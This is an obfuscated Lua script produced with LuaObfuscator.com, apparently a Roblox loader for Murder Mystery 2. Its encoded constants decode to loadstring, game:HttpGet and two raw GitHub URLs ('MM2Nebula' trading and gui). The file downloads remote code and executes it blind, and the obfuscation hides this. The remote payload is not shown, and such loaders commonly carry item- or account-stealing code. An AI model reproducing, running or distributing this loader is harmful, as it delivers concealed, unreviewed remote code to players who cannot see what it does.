--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if (v85==(0 + 0)) then v86=(1 + 1)^(v32-((2515 -(1523 + 114)) -(282 + 535 + 60))) ;return (((v31%(v86 + v86))>=v86) and 1) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(0 + 0) -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((1310 -(87 + 263)) -(892 + 65)) );v18=v18 + ((189 -(67 + 113)) -5) ;return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(1139 -(116 + 1022)) + 0 ;local v45=(v20(v43,1 + 0 ,49 -29 ) * ((2 + 0)^(127 -95))) + v42 ;local v46=v20(v43,39 -(10 + 8) ,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -(0 -0))) and  -((261 + 182) -((1518 -1102) + (92 -66)))) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(997 -(915 + 82))) then return v47 * ((859 -(814 + 45)) -0) ;else v46=1 + 0 ;v44=0;end elseif (v46==((6630 -3939) -644)) then return ((v45==(1187 -(1069 + 118))) and (v47 * ((2 -1)/0))) or (v47 * NaN) ;end return v8(v47,v46-(56 + 967) ) * (v44 + (v45/((3 -1)^(10 + 42)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(886 -(261 + 624)) );v18=v18 + v48 ;local v50={};for v65=1 -0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=0) then else v52=(function() return function(v100,v101,v102) local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();while true do if (v103==(0 + 0)) then v104=(function() return 651 -(494 + 157) ;end)();while true do if ((0 -0)~=v104) then else v100[v101-#"!" ]=(function() return v102();end)();return v100,v101,v102;end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v51=(function() return 1 + 0 ;end)();end if (v51~=(1 + 0)) then else local v89=(function() return 0;end)();while true do if (v89==0) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v89=(function() return 837 -(660 + 176) ;end)();end if (v89==1) then v57=(function() return v23();end)();v51=(function() return 1 + 1 ;end)();break;end end end if (v51~=(204 -(14 + 188))) then else local v90=(function() return 675 -(534 + 141) ;end)();while true do if (v90==1) then v56[ #"19("]=(function() return v21();end)();v51=(function() return 2 + 1 ;end)();break;end if (v90==0) then v58=(function() return {};end)();for v108= #"[",v57 do local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=(1 + 0)) then else v112=(function() return nil;end)();while true do if (v110~=(0 -0)) then else local v131=(function() return 0 -0 ;end)();while true do if (v131==1) then v110=(function() return 1;end)();break;end if (v131~=(0 -0)) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v131=(function() return 1 + 0 ;end)();end end end if (v110==(1 + 0)) then if (v111== #",") then v112=(function() return v21()~=0 ;end)();elseif (v111==2) then v112=(function() return v24();end)();elseif (v111~= #"91(") then else v112=(function() return v25();end)();end v58[v108]=(function() return v112;end)();break;end end break;end if (v109==0) then v110=(function() return 0;end)();v111=(function() return nil;end)();v109=(function() return 397 -(115 + 281) ;end)();end end end v90=(function() return 1;end)();end end end if (3==v51) then for v92= #"<",v23() do local v93=(function() return 0;end)();local v94=(function() return;end)();while true do if (0==v93) then v94=(function() return v21();end)();if (v20(v94, #">", #"}")~=0) then else local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v113~=(0 + 0)) then else v114=(function() return v20(v94,2, #"19(");end)();v115=(function() return v20(v94, #"0836",14 -8 );end)();v113=(function() return 1;end)();end if (v113~=3) then else if (v20(v115, #"91(", #"-19")~= #"]") then else v116[ #"xnxx"]=(function() return v58[v116[ #"?id="]];end)();end v53[v92]=(function() return v116;end)();break;end if (v113==1) then local v130=(function() return 0 -0 ;end)();while true do if (v130~=0) then else v116=(function() return {v22(),v22(),nil,nil};end)();if (v114==0) then local v182=(function() return 0 -0 ;end)();while true do if (v182==(0 -0)) then v116[ #"19("]=(function() return v22();end)();v116[ #"0836"]=(function() return v22();end)();break;end end elseif (v114== #",") then v116[ #"xnx"]=(function() return v23();end)();elseif (v114==(5 -3)) then v116[ #"nil"]=(function() return v23() -(2^(301 -(134 + 151))) ;end)();elseif (v114~= #"19(") then else local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (v189==(1665 -(970 + 695))) then v190=(function() return 0 -0 ;end)();while true do if (0==v190) then v116[ #"xxx"]=(function() return v23() -(2^(2006 -(582 + 1408))) ;end)();v116[ #".com"]=(function() return v22();end)();break;end end break;end end end v130=(function() return 1;end)();end if (v130==(3 -2)) then v113=(function() return 2 -0 ;end)();break;end end end if (v113~=2) then else if (v20(v115, #"|", #"|")~= #":") then else v116[7 -5 ]=(function() return v58[v116[2]];end)();end if (v20(v115,1826 -(1195 + 629) ,2)== #" ") then v116[ #"-19"]=(function() return v58[v116[ #"xxx"]];end)();end v113=(function() return 3 -0 ;end)();end end end break;end end end for v95= #"]",v23() do v54,v95,v28=(function() return v52(v54,v95,v28);end)();end return v56;end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[243 -(187 + 54) ];local v64=v59[3];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=781 -(162 + 618) ;local v72= -(1213 -(323 + 889));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v87=(0 -0) -0 ,v75 do if ((3629>=1417) and (v87>=v69)) then v73[v87-v69 ]=v74[v87 + (1 -0) ];else v77[v87]=v74[v87 + 1 + 0 ];end end local v78=(v75-v69) + (1637 -(1373 + 263)) ;local v79;local v80;while true do local v88=1000 -(451 + 549) ;while true do if (v88==1) then if (v80<=(2 + 2)) then if (v80<=(1 -0)) then if (v80==0) then v71=v79[4 -1 ];else local v119=1384 -((1326 -(361 + 219)) + 638) ;local v120;local v121;local v122;local v123;while true do if ((4795>402) and (v119==(0 + (320 -(53 + 267))))) then v120=v79[2 -0 ];v121,v122=v70(v77[v120](v13(v77,v120 + (342 -(218 + 123)) ,v79[1584 -(1535 + 46) ])));v119=1 + 0 ;end if ((4813>3565) and (v119==(1 + 0))) then v72=(v122 + v120) -1 ;v123=560 -(306 + 254) ;v119=1 + 1 ;end if (v119==(3 -1)) then for v174=v120,v72 do local v175=1467 -(899 + 568) ;while true do if ((3912==3912) and (v175==(0 + 0))) then v123=v123 + (2 -(1 + 0)) ;v77[v174]=v121[v123];break;end end end break;end end end elseif ((2821<=4824) and (v80<=2)) then v77[v79[605 -(268 + 335) ]]=v61[v79[(706 -(15 + 398)) -(60 + 230) ]];elseif (v80==(575 -(426 + 146))) then local v133;local v134,v135;local v136;local v137;v77[v79[1 + (983 -(18 + 964)) ]]=v61[v79[3]];v71=v71 + (1457 -(282 + 1174)) ;v79=v67[v71];v137=v79[2];v136=v77[v79[814 -(569 + 242) ]];v77[v137 + (2 -1) ]=v136;v77[v137]=v136[v79[1 + 3 ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[1026 -(706 + 318) ]]=v79[3];v71=v71 + (1252 -(721 + 530)) ;v79=v67[v71];v137=v79[1273 -(945 + 326) ];v134,v135=v70(v77[v137](v13(v77,v137 + (2 -(3 -2)) ,v79[3 + 0 + 0 ])));v72=(v135 + v137) -(701 -(271 + 429)) ;v133=0 + 0 + 0 ;for v169=v137,v72 do v133=v133 + (1501 -(1408 + 92)) ;v77[v169]=v134[v133];end v71=v71 + ((1937 -(20 + 830)) -(461 + 625)) ;v79=v67[v71];v137=v79[1290 -(993 + 295) ];v77[v137]=v77[v137](v13(v77,v137 + 1 + 0 ,v72));v71=v71 + (1172 -(327 + 91 + (879 -(116 + 10)))) ;v79=v67[v71];v77[v79[1 + 1 + 0 ]]();v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1 + 1 ]]=v61[v79[1 + 2 ]];v71=v71 + (739 -(542 + 196)) ;v79=v67[v71];v77[v79[2]]=v61[v79[(1139 -607) -(406 + 123) ]];v71=v71 + (1770 -(1749 + 20)) ;v79=v67[v71];v137=v79[1 + 1 ];v136=v77[v79[3]];v77[v137 + 1 ]=v136;v77[v137]=v136[v79[1326 -(1249 + 73) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[(335 + 812) -(466 + 679) ]]=v79[6 -3 ];else v77[v79[5 -3 ]]();end elseif ((1738<=2195) and (v80<=(1907 -(106 + 1794)))) then if (v80<=(2 + 2 + 1)) then local v126=0 + 0 ;local v127;while true do if ((0 -0)==v126) then v127=v79[5 -3 ];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));break;end end elseif ((41<=3018) and (v80==(120 -(4 + 110)))) then if ((2145<=4104) and (v77[v79[586 -(21 + 36 + 527) ]]==v79[4])) then v71=v71 + (1428 -(41 + 1386)) ;else v71=v79[106 -(17 + 86) ];end else v77[v79[2 + 0 ]]=v79[6 -3 ];end elseif ((2689<4845) and (v80<=(23 -15))) then v77[v79[168 -(122 + 44) ]]={};elseif (v80==(15 -6)) then do return;end else local v162=0 -0 ;local v163;local v164;while true do if (v162==(0 + 0)) then v163=v79[2];v164=v77[v79[1 + 2 ]];v162=1 -0 ;end if (v162==(66 -((79 -49) + 35))) then v77[v163 + 1 + 0 ]=v164;v77[v163]=v164[v79[4]];break;end end end v71=v71 + 1 ;break;end if (v88==(1257 -(1043 + (548 -334)))) then v79=v67[v71];v80=v79[1];v88=3 -2 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F2Q4D324E6562756C612F2Q4D322F726566732F68656164732F6D61696E2F74726164696E6703433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F2Q4D324E6562756C612F2Q4D322F726566732F68656164732F6D61696E2F67756900154Q00087Q001207000100013Q002606000100020001000100044Q00020001001202000200023Q001203000300033Q00202Q00030003000400122Q000500056Q000300056Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400122Q000500064Q0001000300054Q000500023Q00022Q000400020001000100044Q0014000100044Q000200012Q00093Q00017Q00",v9(),...);
